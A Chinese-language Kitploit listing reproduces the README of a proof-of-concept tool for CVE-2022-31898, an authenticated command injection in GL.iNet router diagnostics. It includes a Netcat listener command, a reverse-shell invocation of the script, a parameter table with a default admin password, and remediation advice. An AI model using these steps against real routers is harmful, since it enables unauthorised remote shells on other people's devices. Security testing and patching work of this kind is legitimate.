Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MangoPunch-CVE-2022-31898 — 认证命令注入工具 (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
工具/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

认证命令注入工具 (CVE-2022-31898) - HACKCONRD 2026.

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
16个月前尚未审核
分享

🥭 MangoPunch:CVE-2022-31898

GL.iNet 设备认证后的操作系统命令注入

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 漏洞概述

本仓库包含针对 GL.iNet MT300N-V2(Mango)及运行固件版本低于 3.215 的其他型号中发现的**远程命令执行(RCE)**漏洞的技术验证代码(PoC)。

该缺陷存在于诊断 API 的 ping_addr 参数中,允许已认证的攻击者通过 shell 元字符(;)执行任意系统命令。


🚀 执行指南

1. 准备监听器

在攻击机(Kali Linux)上打开终端并启动 Netcat 监听器:

root@kitploit:~
nc -lvnp 9292

2. 运行漏洞利用

使用以下命令触发反向 Shell:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ 脚本参数

参数完整名称描述默认值
-R--rhost远程目标 IP(路由器)必填
-P--rportWeb 管理端口443
-L--lhost监听 IP(Kali/攻击机)必填
-l--lport监听端口必填
-p--pwd管理员密码goodlife
-t--https启用 HTTPSFalse

🛡️ 修复建议

  • 更新固件:确保设备运行 3.215 或更高版本。
  • 输入验证:开发者应对 IP/主机名参数实施严格的 Regex 校验,并避免使用将原始字符串直接传递给操作系统的 shell 调用函数。

免责声明:此工具仅用于教育和授权安全测试目的。作者对任何滥用行为不承担责任。

下载工具